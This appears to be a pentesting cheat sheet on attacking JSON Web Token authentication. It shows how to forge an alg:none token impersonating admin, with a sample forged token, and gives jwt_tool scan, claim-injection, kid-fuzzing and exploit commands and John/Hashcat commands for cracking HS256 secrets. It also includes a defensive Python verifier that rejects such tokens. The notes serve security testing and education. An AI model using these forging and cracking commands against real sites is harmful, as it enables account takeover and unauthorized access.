Exploit Notes

JWT (JSON Web Token) Pentesting

Last modified: 2023-03-20

JWT (JSON Web Token, RFC 7519) is a proposed Internet standard for creating data with an optional signature and/or optional encryption, whose payload holds JSON that asserts some number of claims.

Decode JWT

  • There are online JWT decoder/encoder tools such as jwt.io.
  • CyberChef can also be used to decode a JWT.

Manipulate JWT

If the website uses JWT and we can see the token, copy the JWT and paste it into jwt.io.

  1. Replace the “alg” value in the header with “none” (also try header variations such as “none”, “None”, “nOnE” and “NONE”).
  2. Replace arbitrary values in the payload, e.g. “username” with “admin”.
  3. Empty the signature field.

If the error “Invalid Signature” occurs, we can manually Base64url-encode each section (JWT segments use base64url without `=` padding).
If you want to empty the signature field manually, delete the final section but keep the trailing dot.
For example,

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjc4NDYwNjM1fQ.

Now copy the new JWT.
Go to the website and replace the original JWT with the new one in the HTTP header.
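The server-side counterpart to the tampering steps above, as an added example that is not part of the original notes: a minimal HS256 verifier (standard library only) that rejects the alg:none token shown above in any casing, rejects an emptied signature, and only accepts algorithms from its own allow-list. The helper sign_hs256, the secret and the sample payloads are constructed for the demo.

```python
import base64, hashlib, hmac, json
from typing import Optional

ALLOWED_ALGS = {"HS256"}   # server-side allow-list: "none" in any casing is rejected

def b64url_decode(part: str) -> bytes:
    # JWT segments are base64url without padding; restore it before decoding
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def sign_hs256(payload: dict, secret: bytes) -> str:
    # Hypothetical helper, used only to mint a legitimately signed sample token
    h = b64url_encode(b'{"typ":"JWT","alg":"HS256"}')
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"

def verify(token: str, secret: bytes) -> Optional[dict]:
    """Return the payload if the signature is valid, otherwise None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h_b64, p_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(h_b64))
        presented = b64url_decode(sig_b64)      # b"" when the signature was emptied
    except ValueError:                          # covers binascii.Error and bad JSON
        return None
    # The algorithm comes from the allow-list, never from the attacker-controlled header
    if not isinstance(header, dict) or header.get("alg") not in ALLOWED_ALGS:
        return None
    expected = hmac.new(secret, f"{h_b64}.{p_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, presented):   # constant-time comparison
        return None
    return json.loads(b64url_decode(p_b64))

# Constructed sample: the alg:none token from the notes above with an emptied signature
TAMPERED = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0."
            "eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjc4NDYwNjM1fQ.")
SECRET = b"constructed-demo-secret"

def demo() -> tuple:
    """The tampered token must be rejected; a properly signed one must verify."""
    good = sign_hs256({"username": "alice"}, SECRET)
    return verify(TAMPERED, SECRET), verify(good, SECRET)

if __name__ == "__main__":
    print(demo())   # (None, {'username': 'alice'})
```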


Automation

JWT Toolkit (jwt_tool) is a toolkit for testing, tweaking and cracking JWTs.

Decode

python jwt_tool.py <Base64_Encoded_JWT>

Scan

# -t: Target URL
# -rc: Cookies
# -M pb: Playbook Scan Mode
# -cv: Canary Value
python jwt_tool.py -t https://vulnerable.com/admin -rc "jwt=<Base64_Encoded_JWT>;anothercookie=test" -M pb -cv "not authorized"

Exploit

# -X i: Exploit (inject inline)
# -I -pc username -pv admin: Inject Claim ("username": admin)
python jwt_tool.py -t https://vulnerable.com/admin -rc "jwt=<Base64_Encoded_JWT>;anothercookie=test" -X i -I -pc username -pv admin

Fuzz

# -I -hc kid -hv wordlist.txt: Inject Claim ("kid": FUZZ)
python jwt_tool.py -t https://vulnerable.com/admin -rc "jwt=<Base64_Encoded_JWT>;anothercookie=test" -I -hc kid -hv wordlist.txt

Manual Pentesting

# Tamper (Manual Exploit)
python jwt_tool.py <Base64_Encoded_JWT> -T

# Exploit (Automated Exploit)
# -X a: Exploit (alg: none)
python jwt_tool.py <Base64_Encoded_JWT> -X a

Crack JWT Secret

First of all, put the JWT into a text file.

echo -n '<Base64_Encoded_JWT>' > jwt.txt

Then crack the signing secret using John the Ripper or Hashcat (hashcat mode 16500 is the JWT HS256 mode).

john --format=HMAC-SHA256 --wordlist=/usr/share/wordlists/rockyou.txt jwt.txt

hashcat -a 0 -m 16500 jwt.txt passwords.txt
hashcat -a 0 -m 16500 jwt.txt passwords.txt -r rules/best64.rule
hashcat -a 3 -m 16500 jwt.txt '?u?l?l?l?l?l?l?l' -i --increment-min=6

If you find the secret, you can create a new JWT signed with it using tools like jwt.io.

jwt-cracker can also be used for this.
